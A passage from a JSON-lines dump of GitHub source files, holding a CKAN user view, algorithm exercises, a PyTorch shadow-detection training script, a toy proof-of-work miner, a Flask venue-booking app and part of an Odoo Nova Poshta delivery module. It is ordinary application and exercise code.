%s') % id)\n except logic.NotFound:\n base.abort(404, _(u'User not found'))\n except logic.ValidationError as e:\n errors = e.error_dict\n error_summary = e.error_summary\n return self.get(id, data_dict, errors, error_summary)\n\n h.flash_success(_(u'Profile updated'))\n resp = h.redirect_to(u'user.read', id=user[u'name'])\n if current_user and data_dict[u'name'] != old_username:\n # Changing currently logged in user's name.\n # Update repoze.who cookie to match\n set_repoze_user(data_dict[u'name'], resp)\n return resp\n\n def get(self, id=None, data=None, errors=None, error_summary=None):\n context, id = self._prepare(id)\n data_dict = {u'id': id}\n try:\n old_data = logic.get_action(u'user_show')(context, data_dict)\n\n g.display_name = old_data.get(u'display_name')\n g.user_name = old_data.get(u'name')\n\n data = data or old_data\n\n except logic.NotAuthorized:\n base.abort(403, _(u'Unauthorized to edit user %s') % u'')\n except logic.NotFound:\n base.abort(404, _(u'User not found'))\n user_obj = context.get(u'user_obj')\n\n errors = errors or {}\n vars = {\n u'data': data,\n u'errors': errors,\n u'error_summary': error_summary\n }\n\n extra_vars = _extra_template_variables({\n u'model': model,\n u'session': model.Session,\n u'user': g.user\n }, data_dict)\n\n extra_vars[u'show_email_notifications'] = asbool(\n config.get(u'ckan.activity_streams_email_notifications'))\n vars.update(extra_vars)\n extra_vars[u'form'] = base.render(edit_user_form, extra_vars=vars)\n\n return base.render(u'user/edit.html', extra_vars)\n\n\n_edit_view = EditView.as_view(str(u'edit'))\nuser.add_url_rule(u'/', view_func=_edit_view)\nuser.add_url_rule(u'/<id>', view_func=_edit_view)\n","repo_name":"ALTERNATIVE-EU/ckanext-keycloak_auth","sub_path":"ckanext/keycloak_auth/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73030138409","text":"def solution(n, t, m, timetable):\n timetable = sorted(timetable, reverse=True)\n timetable = [int(time[:2]) * 60 + int(time[3:]) for time in timetable]\n\n for i in range(n):\n arriveTime = 540 + i * t\n cnt = 0\n\n while timetable:\n if timetable[-1] > arriveTime or cnt >= m:\n break\n\n lastTime = timetable[-1]\n timetable.pop()\n cnt += 1\n\n if not timetable:\n if cnt < m:\n answer = arriveTime\n else:\n answer = lastTime - 1\n return '%02d:%02d' % (answer // 60, answer % 60)\n\n if i == n - 1:\n if cnt < m:\n answer = arriveTime\n else:\n answer = lastTime - 1\n return '%02d:%02d' % (answer // 60, answer % 60)\n","repo_name":"CHOSIYEON/Algorithms","sub_path":"KAKAO/Level 3/[1차] 셔틀버스.py","file_name":"[1차] 셔틀버스.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11643730838","text":"'''\n给你一个链表的头节点 head 和一个特定值 x ,请你对链表进行分隔,使得所有 小于 x 的节点都出现在 大于或等于 x 的节点之前。\n\n你应当 保留 两个分区中每个节点的初始相对位置。\n\n示例 1:\n输入:head = [1,4,3,2,5,2], x = 3\n输出:[1,2,2,4,3,5]\n\n示例 2:\n输入:head = [2,1], x = 2\n输出:[1,2]\n\n'''\n\nfrom Def import LinkedList\n\nclass Solution:\n def partition(self, head, x):\n large = LinkedList.Node(0, None)\n little = LinkedList.Node(0, head)\n\n currli = little\n currla = large\n while currli.next:\n if currli.next.val >= x:\n currla.next = currli.next\n \n currli.next = currli.next.next\n\n currla = currla.next\n currla.next = None\n\n else:\n currli = currli.next\n currli.next = large.next\n return little.next\n\n \nL1 = [1,4,3,2,5,2]\nL1 = LinkedList.list_to_Linked(L1)\n\nS = Solution() \nre = LinkedList.linked_to_list(S.partition(L1, 3))\nprint(re) \n","repo_name":"He1o/NootBook_LeetCode","sub_path":"old/Def/86.分隔链表.py","file_name":"86.分隔链表.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27625948884","text":"import os\nimport torch\nfrom torchvision import transforms\nfrom torch.utils.tensorboard import SummaryWriter\nfrom os.path import join as pjoin\nimport argparse\n\nfrom torch.backends import cudnn\n\ncudnn.benchmark = True\nfrom PIL import ImageFile\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\nfrom model.network import Network, Weighted_BCE_Loss\nfrom data.data_augmentation import data_augmentation\nfrom utils import initialize_project, build_dataloader, AvgMeter, check_refine, save_mask, get_model_args\n\nhistory_BER = None\nhistory_epoch = None\n\n\ndef main(args):\n global history_BER, history_epoch # to record the best ckpt in training\n args_train = args['training_config']\n\n project_dir = pjoin(args['project_config']['save_project_dir'], args['project_config']['project_name'])\n\n refined_img_path = pjoin(project_dir, 'refined_data_%s' % args_train['dataset'])\n refinement_visualization_path = pjoin(project_dir, 'refinement_visualize')\n dataset_path = args['data_dir'][args_train['dataset']]\n save_ckpt_path = pjoin(project_dir, 'weights')\n\n # prepare data, directories and visualizations\n initialize_project(refined_img_path, refinement_visualization_path, save_ckpt_path, dataset_path, args)\n\n net = Network(\n input_resolution=args_train['data']['resolution'],\n backbone=args_train['backbone'],\n backbone_ckpt=args['pretrained_encoder_dir'][args_train['backbone']]\n ).cuda()\n\n tensorboard_path = pjoin(project_dir, 'tensorboard')\n writer = SummaryWriter(tensorboard_path)\n\n for T in range(args_train['round']):\n\n train_loader, test_loader, refine_loader = build_dataloader(refined_img_path, dataset_path, args)\n loss_fn = Weighted_BCE_Loss(mu=0.7, eps=1e-5)\n optimizer = torch.optim.Adamax(filter(lambda p: p.requires_grad, net.parameters()), args_train['train']['lr'])\n\n history_BER = 9999\n history_epoch = 0\n\n train(net, optimizer, loss_fn, writer, train_loader, test_loader, T + 1, project_dir, args)\n\n if T != args_train['round'] - 1:\n refine(net, refine_loader, T + 1, refinement_visualization_path, args)\n\n writer.close()\n\n\ndef train(net, optimizer, loss_fn, writer, train_loader, test_loader, round, project_path, args):\n net.train()\n train_net_loss_record = AvgMeter()\n total_iter = 0\n args_train = args['training_config']\n\n for epoch in range(args_train['train']['total_epoch']):\n print('total parameters: %d' % (sum(p.numel() for p in net.parameters())))\n\n for data in train_loader:\n total_iter += 1\n\n inputs, gts = data\n if args_train['data']['data_augmentation']:\n inputs, gts = data_augmentation(inputs, gts, args_train['data']['layers'],\n args_train['data']['augmentation_magnitude'])\n inputs = inputs.cuda()\n gts = gts.cuda()\n\n optimizer.zero_grad()\n result = net(inputs)\n loss_net = loss_fn(result, gts)\n loss_net.backward()\n optimizer.step()\n\n writer.add_scalar('Loss', loss_net, total_iter)\n train_net_loss_record.update(loss_net.data, inputs.size(0))\n\n log = '[round %d] [epoch %d] [iter %d] [train loss %.5f] [curr_optimal %.4f]' % \\\n (round, epoch + 1, total_iter, train_net_loss_record.avg, history_BER)\n print(log)\n\n if (total_iter + 1) % args_train['train']['save_mask_freq'] == 0:\n with torch.no_grad():\n save_mask(inputs.cpu(), result.cpu(), gts.cpu(), total_iter, project_path,\n args_train['data']['resolution'])\n\n validate(net, epoch + 1, test_loader, round, writer, args)\n\n\ndef validate(net, epoch, test_loader, round, writer, args):\n print('validating...')\n net.eval()\n\n total_Tp = 0\n total_Tn = 0\n total_P = 0\n total_N = 0\n\n global history_BER, history_epoch\n\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n inputs, gts = data\n inputs = inputs.cuda()\n gts = gts.cuda()\n\n res = net(inputs)\n\n gts_map = gts > 0.5\n res_map = res > 0.5\n\n total_P += torch.sum(gts_map == True).item()\n total_N += torch.sum((gts_map == False)).item()\n total_Tp += torch.sum((gts_map == True) & (res_map == True)).item()\n total_Tn += torch.sum((gts_map == False) & (res_map == False)).item()\n\n print('validating: %d/%d' % (i + 1, len(test_loader)))\n\n BER = 0.5 * (2 - total_Tp / total_P - total_Tn / total_N) * 100\n writer.add_scalar('BER on validation, round %d' % (round), BER, epoch + 1)\n\n if (BER < history_BER):\n save_ckpt_path = pjoin(args['project_config']['save_project_dir'], args['project_config']['project_name'],\n 'weights')\n\n # remove previous ckpt\n old_weight_path = pjoin(save_ckpt_path, '%.4f_round%d_epoch%d.pth' % (history_BER, round, history_epoch))\n if os.path.exists(old_weight_path):\n os.system('rm %s' % old_weight_path)\n\n history_BER = BER\n history_epoch = epoch\n new_weight_path = pjoin(save_ckpt_path, '%.4f_round%d_epoch%d.pth' % (history_BER, round, history_epoch))\n checkpoint = {\n 'state_dict': net.state_dict(),\n 'configs': args\n }\n torch.save(checkpoint, new_weight_path)\n\n net.train()\n\n\ndef refine(net, refine_loader, round, refinement_visualization_path, args):\n print('refining...')\n\n # load the best ckpt\n params_path = pjoin(args['project_config']['save_project_dir'], args['project_config']['project_name'], 'weights',\n '%.4f_round%d_epoch%d.pth' % (history_BER, round, history_epoch))\n net.load_state_dict(torch.load(params_path, map_location=lambda storage, loc: storage.cuda(0))['state_dict'])\n\n net.eval()\n\n args_refine = args['training_config']['refine']\n with (torch.no_grad()):\n for idx, data in enumerate(refine_loader):\n if idx == len(refine_loader) - 1: # this is a problem with the dataloader\n break\n\n img, gts, gts_path, size = data\n img_var = img.cuda()\n\n if args_refine['crop']:\n crop_num = args_refine['crop_size'] * args_refine['crop_size']\n img_sep = torch.zeros(\n (crop_num + 1, 3, args_refine['refine_resolution'], args_refine['refine_resolution'])).cuda()\n\n img_sep[-1] = img_var.squeeze(0).clone()\n\n length = args_refine['refine_resolution'] // args_refine['crop_size']\n for i in range(args_refine['crop_size']):\n for j in range(args_refine['crop_size']):\n img_sep[i * args_refine['crop_size'] + j] = transforms.Resize(args_refine['refine_resolution'])(\n img_var[:, :, \\\n i * length:(i + 1) * length, j * length:(j + 1) * length].squeeze(0))\n\n res_ini = net(img_sep)\n res_global = res_ini[-1].unsqueeze(0).clone()\n\n res_ini = transforms.Resize(length)(res_ini)\n\n res_local = torch.zeros(\n (1, 1, args_refine['refine_resolution'], args_refine['refine_resolution'])).cuda()\n for i in range(args_refine['crop_size']):\n for j in range(args_refine['crop_size']):\n res_local[:, :, i * length:(i + 1) * length, j * length:(j + 1) * length] = \\\n res_ini[i * args_refine['crop_size'] + j:i * args_refine['crop_size'] + j + 1]\n\n res_local = res_local * (res_global > args_refine['filter_threshold'])\n res = torch.maximum(res_global, res_local)\n\n else:\n res = net(img_var)\n res_global = res\n res_local = res\n\n gts_refined, is_refined = check_refine( # check whether to accept the refined mask\n img.squeeze(0).cuda(), res.squeeze(0), gts.squeeze(0).cuda(),\n idx + 1, res_global.squeeze(0), res_local.squeeze(0),\n args_refine,\n refinement_visualization_path)\n gts_refined = transforms.Resize(size)(transforms.ToPILImage()(gts_refined))\n if is_refined:\n gts_refined.save(gts_path[0])\n\n print('refining: %d/%d' % (idx + 1, len(refine_loader)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-c',\n \"--config\",\n type=str,\n required=False,\n default='configs/silt_training_config.yaml',\n help=\"The yaml file for the model's configuration\",\n )\n\n parser.add_argument(\n '-s',\n \"--save_project_dir\",\n type=str,\n required=False,\n default='ckpt',\n help=\"path to save the project results\",\n )\n\n parser.add_argument(\n '-n',\n \"--project_name\",\n type=str,\n required=False,\n default=None,\n help=\"name of the project\",\n )\n\n parser.add_argument(\n '-d',\n \"--dataset\",\n type=str,\n required=False,\n default='SBU',\n help=\"training dataset\",\n choices=['SBU', 'UCF', 'ISTD']\n )\n\n parser.add_argument(\n '-b',\n \"--backbone\",\n type=str,\n required=False,\n default='PVT-b5',\n help=\"network backbone name\",\n choices=['ResNeXt', 'efficientnet-b3', 'efficientnet-b7', 'efficientnet-b8',\n 'convnext-small', 'convnext-base', 'PVT-b3', 'PVT-b5']\n )\n\n args_from_parser = parser.parse_args()\n args = get_model_args(args_from_parser)\n\n main(args)\n","repo_name":"Cralence/SILT","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"74163189929","text":"from hashlib import sha256\n\nMAX_NONCE = 10000000000\n\n# SHA256 is an algorithm for \ndef SHA256(text):\n return sha256(text.encode(\"ascii\")).hexdigest()\n\ndef mine(block_number, transactions, previous_hash, prefix_zeros):\n prefix_str = '0'*prefix_zeros\n for nonce in range(MAX_NONCE):\n text = str(block_number) + transactions + previous_hash + str(nonce)\n new_hash = SHA256(text)\n if new_hash.startswith(prefix_str):\n print(f\"Cool! Succesfully mined bictoins with nonce value: {nonce}\")\n return new_hash\n \n raise BaseException(f\"Sorry! Could not find it after trying {MAX_NONCE} times\")\n\n# Main block\nif __name__ == \"__main__\":\n transactions = '''\n Baldur->John->20\n Lara->Freya->45\n '''\n # Try to change this to higher number, and you see it will take more time for mining as difficulty level increases\n difficulty = 5\n import time\n start = time.time()\n print('Start mining ... ⛏️ ')\n \n new_hash = mine(6, transactions, \n 'aded354032d0a8e9d9c51995ed73b5a056d5ffe6', difficulty)\n time_spent_on_mining = str((time.time() - start))\n print(f\"Mining Terminated ⚒️ in {time_spent_on_mining} seconds.\")\n print(new_hash)\n \n ","repo_name":"BekBrace/four-projects-python","sub_path":"4bitcoin.py","file_name":"4bitcoin.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34397133540","text":"# ----------------------------------------------------------------------------#\n# Imports\n# ----------------------------------------------------------------------------#\nimport logging\nimport os\nimport sys\nfrom logging import FileHandler, Formatter\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom formss import *\nfrom flask_wtf import Form\nfrom model import Artist, Venue, Show, db\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nimport dateutil.parser\nimport babel\n\n# ----------------------------------------------------------------------------#\n# App Config.\n# ----------------------------------------------------------------------------#\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb.init_app(app)\nmigrate = Migrate(app, db)\nSQLALCHEMY_DATABASE_URI = 'postgres://Ammar@localhost:5432/fyyur'\n\n\n# Filters.\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format = \"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format = \"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n\n# ----------------------------------------------------------------------------#\n# Controllers.\n# ----------------------------------------------------------------------------#\n\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n venues = Venue.query.order_by(Venue.state, Venue.city).all()\n data = []\n for v in venues:\n regions = Venue.query.filter_by(state=v.state).filter_by(city=v.city).all()\n datum = []\n for venue in regions:\n datum.append({\n \"id\": venue.id,\n \"name\": venue.name,\n \"num_upcoming_shows\": len(list(filter(lambda x: x.start_time > datetime.today(),\n venue.shows)))\n })\n data.append({\n \"city\": v.city,\n \"state\": v.state,\n \"venues\": datum\n })\n\n return render_template('pages/venues.html', areas=data)\n\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n search_term = request.form.get('search_term')\n venue = Venue.query.filter(\n Venue.name.ilike(\"%{}%\".format(search_term))).all()\n count_venues = len(venue)\n datum = [v.to_dict() for v in venue]\n response = {\n \"count\": count_venues,\n \"data\": datum\n }\n return render_template('pages/search_venues.html', results=response,\n search_term=request.form.get('search_term', None))\n\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n venues = Venue.query.get(venue_id)\n data = venues.todict_shows()\n return render_template('pages/show_venue.html', venue=data)\n\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n error = False\n try:\n venue = Venue()\n venue.name = request.form['name']\n venue.city = request.form['city']\n venue.state = request.form['state']\n venue.address = request.form['address']\n venue.phone = request.form['phone']\n genre = request.form.getlist('genres')\n venue.genres = ','.join(genre)\n venue.facebook_link = request.form['facebook_link']\n db.session.add(venue)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n db.session.close()\n if error:\n flash('An error occured. Venue ' +\n request.form['name'])\n else:\n flash('Venue ' + request.form['name'] +\n ' was successfully added!')\n return render_template('pages/home.html')\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n artists = Artist.query.all()\n tmp = [a.todict_shows() for a in artists]\n data = tmp\n return render_template('pages/artists.html', artists=data)\n\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n search_term = request.form.get('search_term')\n artist = Artist.query.filter(\n Artist.name.ilike(\"%{}%\".format(search_term))).all()\n count_venues = len(artist)\n datum = [a.to_dict() for a in artist]\n response = {\n \"count\": count_venues,\n \"data\": datum\n }\n return render_template('pages/search_artists.html', results=response,\n search_term=request.form.get('search_term', None))\n\n\n@app.route('/artists/<int:artist_id>')\ndef show_artist(artist_id):\n artist = Artist.query.get(artist_id)\n data = artist.todict_shows()\n return render_template('pages/show_artist.html', artist=data)\n\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n form = ArtistForm()\n artist = Artist.query.get(artist_id)\n\n if artist:\n form.name.data = artist.name\n form.city.data = artist.city\n form.state.data = artist.state\n form.phone.data = artist.phone\n form.genres.data = artist.genres\n form.facebook_link.data = artist.facebook_link\n form.image_link.data = artist.image_link\n form.website.data = artist.website\n form.seeking_venue.data = artist.seeking_venue\n form.seeking_description.data = artist.seeking_description\n\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n error = False\n artist = Artist.query.get(artist_id)\n\n try:\n artist.name = request.form['name']\n artist.city = request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone']\n artist.genres = request.form.getlist('genres')\n artist.image_link = request.form['image_link']\n artist.facebook_link = request.form['facebook_link']\n artist.website = request.form['website']\n artist.seeking_venue = True if 'seeking_venue' in request.form else False\n artist.seeking_description = request.form['seeking_description']\n\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n if error:\n flash('Artist could not be changed.')\n if not error:\n flash('Artist was successfully updated!')\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = Venue.query.get(venue_id)\n\n if venue:\n form.name.data = venue.name\n form.city.data = venue.city\n form.state.data = venue.state\n form.phone.data = venue.phone\n form.genres.data = venue.genres\n form.facebook_link.data = venue.facebook_link\n form.image_link.data = venue.image_link\n form.website.data = venue.website\n form.seeking_talent.data = venue.seeking_talent\n form.seeking_description.data = venue.seeking_description\n\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n error = False\n venue = Venue.query.get(venue_id)\n\n try:\n venue.name = request.form['name']\n venue.city = request.form['city']\n venue.state = request.form['state']\n venue.phone = request.form['phone']\n venue.genres = request.form.getlist('genres')\n venue.image_link = request.form['image_link']\n venue.facebook_link = request.form['facebook_link']\n venue.website = request.form['website']\n venue.seeking_talent = True if 'seeking_talent' in request.form else False\n venue.seeking_description = request.form['seeking_description']\n\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n if error:\n flash('venue could not be changed.')\n if not error:\n flash('venue was successfully updated!')\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n\n# Create Artist\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n error = False\n artist = Artist()\n try:\n artist.name = request.form['name']\n artist.city = request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone'],\n artist.facebook_link = request.form['facebook_link'],\n artist.genres = request.form.getlist('genres'),\n artist.image_link = request.form['image_link']\n artist.website = request.form['website']\n artist.seeking_venue = True if 'seeking_venue' in request.form else False\n artist.seeking_description = request.form['seeking_description']\n db.session.add(artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n if error:\n flash('An error ' + request.form['name'] + ' could not be listed.')\n if not error:\n flash(request.form['name'] + ' was successfully added!')\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n\n@app.route('/shows')\ndef shows():\n shows_query = db.session.query(Show).join(Artist).join(Venue).all()\n\n data = []\n for show in shows_query:\n data.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name,\n \"artist_image_link\": show.artist.image_link,\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"start_time\": show.start_time.strftime('%Y-%m-%d %H:%M:%S')\n })\n\n return render_template('pages/shows.html', shows=data)\n\n\n@app.route('/shows/create')\ndef create_shows():\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n error = False\n try:\n show = Show()\n show.artist_id = request.form['artist_id']\n show.venue_id = request.form['venue_id']\n show.start_time = request.form['start_time']\n db.session.add(show)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n if error:\n flash('An error occurred.')\n else:\n flash(' show was successfully added')\n return render_template('pages/home.html')\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n# ----------------------------------------------------------------------------#\n# Launch.\n# ----------------------------------------------------------------------------#\n\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 8080))\n app.run(host='0.0.0.0', port=port)\n","repo_name":"AmmarMousa17/Fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32362417607","text":"import pygame\r\nfrom colors import *\r\n\r\n# display how to use pane\r\ndef how_to_use(width):\r\n TEXTSPACING = 20\r\n HEADERSPACING = 25\r\n PARAGRAPHSPACING = 10\r\n display_surface = pygame.display.set_mode((width, width))\r\n pygame.display.set_caption('How To')\r\n\r\n header1 = make_header(\"Setting Points\")\r\n header2 = make_header(\"Setting Algorithm\")\r\n header3 = make_header(\"Reset\")\r\n header4 = make_header(\"Execute\")\r\n header5 = make_header(\"How To Read Results\")\r\n header6 = make_header(\"Back To Menu\")\r\n\r\n text1 = make_text(\"Choose the points you would like to add using the up and down keys. The current\")\r\n text2 = make_text(\"choice of points is displayed in the bottom left corner. The orange point is start\")\r\n text3 = make_text(\"point, the turqouise point is the end point and the black points are wall points.\")\r\n text4 = make_text(\"There can only be 1 start and 1 end point. If another start or end point is added \")\r\n text5 = make_text(\"it will remove the other start or end point respectively.\")\r\n\r\n text6 = make_text(\"Choose the algorithm to find the path using the left and right keys. The current\")\r\n text7 = make_text(\"chosen algorithm is displayed in the bottom right corner.\")\r\n\r\n text8 = make_text(\"To reset the grid, press the 'c' key.\")\r\n\r\n text9 = make_text(\"To execute the algorithm, press the space key. Once completed the path length\")\r\n text10 = make_text(\"will be displayed in the top right corner. No changes can be made to the grid\")\r\n text11 = make_text(\"once the program is executed until the board is reset.\")\r\n\r\n text12 = make_text(\"Once executed the points that have been checked will be colored in red, then\")\r\n text13 = make_text(\"when the end point is found, the path will be colored in purple.\")\r\n\r\n text14 = make_text(\"To go back to the menu, press the 'c' key.\")\r\n\r\n while True:\r\n display_surface.fill(WHITE)\r\n i = 0\r\n j = 0\r\n display_surface.blit(header1, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text1, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text2, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text3, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text4, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text5, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header2, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text6, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text7, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header3, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text8, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header4, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text9, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text10, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text11, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header5, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text12, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text13, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header6, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text14, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_c:\r\n pygame.display.set_caption(\"Menu\")\r\n return\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n pygame.display.update()\r\n#create text from parameter in the header font\r\ndef make_header(text):\r\n header_font = pygame.font.Font('freesansbold.ttf', 20)\r\n return header_font.render(text, True, BLACK, WHITE)\r\n# create text from parameter in regular text font\r\ndef make_text(text):\r\n text_font = pygame.font.SysFont('timesnewroman',15)\r\n return text_font.render(text, True, BLACK, WHITE)","repo_name":"JustinWhalley-Carleton/Path_Finding_Algorithms","sub_path":"how_to_use.py","file_name":"how_to_use.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35917112658","text":"from odoo import _, fields, models\nfrom odoo.exceptions import UserError\n\n\nclass ProviderNP(models.Model):\n _inherit = \"delivery.carrier\"\n\n def np_send_shipping(self, pickings):\n for picking in pickings:\n error_messages = []\n error = False\n\n if picking.cost == 0:\n error_messages.append(_(\"Cost not specified\"))\n error = True\n\n if picking.np_shipping_weight == 0:\n error_messages.append(_(\"Shipping weight not specified\"))\n error = True\n\n if picking.np_shipping_volume == 0:\n error_messages.append(_(\"Shipping volume not specified\"))\n error = True\n\n if not picking.biko_recipient_id:\n error_messages.append(_(\"Recipient person not specified\"))\n error = True\n elif not picking.biko_recipient_id.mobile:\n error_messages.append(_(\"Recipient person mobile not specified\"))\n error = True\n\n if error:\n raise UserError(\"\\n\".join(error_messages))\n\n data = {\n \"name\": picking.sale_id.name,\n \"order_to_deliver\": picking.sale_id.id,\n \"salesperson\": picking.sale_id.user_id.id,\n \"payer_type\": picking.payer_type.id or self.np_payer_type.id,\n \"payment_method\": picking.payment_method.id\n or self.np_payment_method.id,\n \"cargo_type\": picking.cargo_type.id or self.np_cargo_type.id,\n \"city_sender\": picking.sender_city.id or self.np_city_sender.id,\n \"sender_warehouse\": picking.sender_warehouse.id\n or self.np_sender_warehouse.id,\n \"contact_sender\": self.np_contact_sender.id,\n \"service_type\": picking.service_type.id or self.np_service_type.id,\n \"datetime\": picking.scheduled_date,\n \"seats_amount\": picking.seats_amount,\n \"recipient_city\": picking.recipient_city.id\n or picking.sale_id.partner_shipping_id.np_city.id,\n \"cost\": picking.cost,\n \"weight\": picking.np_shipping_weight,\n \"np_length\": picking.np_length,\n \"np_width\": picking.np_width,\n \"np_height\": picking.np_height,\n \"general_volume\": picking.np_shipping_volume,\n \"recipient_id\": picking.biko_recipient_id.id,\n \"biko_dropshipping\": picking.biko_dropshipping,\n }\n if picking.backward_money:\n data.update(\n {\n \"backward_money\": picking.backward_money,\n \"bm_payer_type\": picking.bm_payer_type.id,\n \"backward_money_costs\": picking.backward_money_costs,\n }\n )\n if picking.afterpayment_check:\n data.update(\n {\n \"afterpayment_check\": picking.afterpayment_check,\n \"backward_money_costs\": picking.backward_money_costs,\n }\n )\n\n service_type = (\n self.env[\"delivery_novaposhta.service_types\"]\n .browse(data[\"service_type\"])\n .ref\n )\n if service_type in [\n \"DoorsDoors\",\n \"WarehouseDoors\",\n ]:\n data.update(\n {\n \"recipient_house\": picking.recipient_house\n or picking.sale_id.partner_shipping_id.house,\n \"recipient_flat\": picking.recipient_flat\n or picking.sale_id.partner_shipping_id.flat,\n \"streets\": picking.streets.id\n or picking.sale_id.partner_shipping_id.np_street.id,\n }\n )\n else:\n data.update(\n {\n \"recipient_warehouse\": picking.recipient_warehouse.id\n or picking.sale_id.partner_shipping_id.np_warehouse.id,\n }\n )\n if self.notification:\n ttn = (\n 